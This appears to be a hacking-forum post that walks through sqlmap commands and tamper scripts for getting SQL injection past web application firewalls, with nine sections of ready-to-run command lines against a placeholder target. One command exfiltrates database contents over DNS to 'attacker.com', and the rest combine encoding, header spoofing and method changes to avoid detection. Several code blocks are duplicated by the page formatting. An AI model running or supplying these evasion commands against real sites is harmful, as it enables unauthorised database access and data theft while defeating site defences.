Owner
Owner
Moderator
Active User
- Joined
- Aug 23, 2023
- Messages
- 242
- Solutions
- 3
- Reaction score
- 1,127
- Points
- 3,131
- Location
- Senegal
- Website
- cyberdark.org
Introduction:
Web Application Firewalls (WAF) are often used to block SQL injection attacks, but they are not foolproof. SQLmap, a popular SQL injection tool, offers several ways to bypass WAF protections by using various options and tamper scripts. This post will dive into practical SQLmap commands and techniques to bypass WAF filters effectively.
1. Basic SQLmap Command for WAF Bypass:
When starting with SQLmap, the first step is testing a target URL to identify vulnerabilities. You can use tamper scripts to modify payloads and avoid detection by WAFs.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=randomcase,between
- --tamper=randomcase: Randomizes the case of the payload to evade simple WAFs.
- --tamper=between: Inserts BETWEEN conditions to break typical patterns WAFs look for.
2. Using SQLmap with Random User Agents and Encoding:
WAFs often detect attacks based on user-agent strings or specific patterns. Using random user agents and encoding can bypass some basic defenses.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --random-agent --tamper=base64encode
Bash:
sqlmap -u "http://target.com/page?id=1" --random-agent --tamper=base64encode
- --random-agent: Sends requests with random user-agent strings to avoid pattern recognition.
- --tamper=base64encode: Encodes the payload in Base64 to obfuscate the attack.
3. Exploiting Time-Based Blind SQL Injection to Evade WAF:
Time-based SQL injections rely on delayed responses to confirm vulnerability without using explicit error messages, making them harder to detect by WAFs.
Bash:
sqlmap -u "http://target.com/page?id=1" --technique=T --tamper=space2comment
Bash:
sqlmap -u "http://target.com/page?id=1" --technique=T --tamper=space2comment
- --technique=T: Forces the use of time-based techniques for injection.
- --tamper=space2comment: Converts spaces to comments (/**/) to bypass WAF filters.
4. Using DNS Exfiltration for Stealthy Data Extraction:
Sometimes WAFs block direct data extraction methods. SQLmap supports out-of-band (OOB) techniques like DNS exfiltration, where data is sent through DNS queries.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --dns-domain=attacker.com --tamper=charencode
Bash:
sqlmap -u "http://target.com/page?id=1" --dns-domain=attacker.com --tamper=charencode
- --dns-domain=attacker.com: Uses DNS to extract data, bypassing WAF by sending information to the specified domain.
- --tamper=charencode: Encodes the payload as char codes to avoid detection by WAF rules.
5. Combining Multiple Tamper Scripts for Complex WAFs:
To bypass more sophisticated WAFs, you may need to use multiple tamper scripts in combination. SQLmap allows you to chain tamper scripts to break down even the most robust defenses.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,randomcase,between
Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=space2comment,randomcase,between
- --tamper=space2comment: Replaces spaces with comments.
- --tamper=randomcase: Randomizes the case of SQL keywords to avoid pattern matching.
- --tamper=between: Inserts BETWEEN operators to break up logical queries.
6. Obfuscating SQL Queries with Hex Encoding:
SQLmap can obfuscate queries by converting them to hexadecimal format. This method can confuse WAFs that are not equipped to handle such encodings.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=hexencode
Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=hexencode
- --tamper=hexencode: Converts the payload into hexadecimal format, which bypasses simple pattern-based WAFs.
7. Changing HTTP Methods to Evade Detection:
Sometimes, changing the HTTP method (GET to POST or vice versa) can help evade WAF detection by altering how the payload is sent.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --method=POST --tamper=space2hash
Bash:
sqlmap -u "http://target.com/page?id=1" --method=POST --tamper=space2hash
- --method=POST: Changes the request method to POST to avoid GET-based filters.
- --tamper=space2hash: Replaces spaces with the # symbol to bypass WAF filtering.
Bash:
8. Testing with Custom HTTP Headers:
Bash:
8. Testing with Custom HTTP Headers:
WAFs often inspect standard HTTP headers, so sending custom headers or cookies can help avoid detection.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --headers="X-Forwarded-For: 127.0.0.1" --tamper=appendnullbyte
Bash:
sqlmap -u "http://target.com/page?id=1" --headers="X-Forwarded-For: 127.0.0.1" --tamper=appendnullbyte
- --headers: Adds a custom header to the HTTP request.
- --tamper=appendnullbyte: Adds a null byte (%00) to the end of the payload to bypass filters that expect a specific string structure.
9. Evasion with String Concatenation:
SQLmap allows the use of string concatenation to break up common SQL keywords that WAFs look for.
Example:
Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=equaltolike
Bash:
sqlmap -u "http://target.com/page?id=1" --tamper=equaltolike
- --tamper=equaltolike: Replaces = with LIKE to obfuscate the payload and evade WAF detection.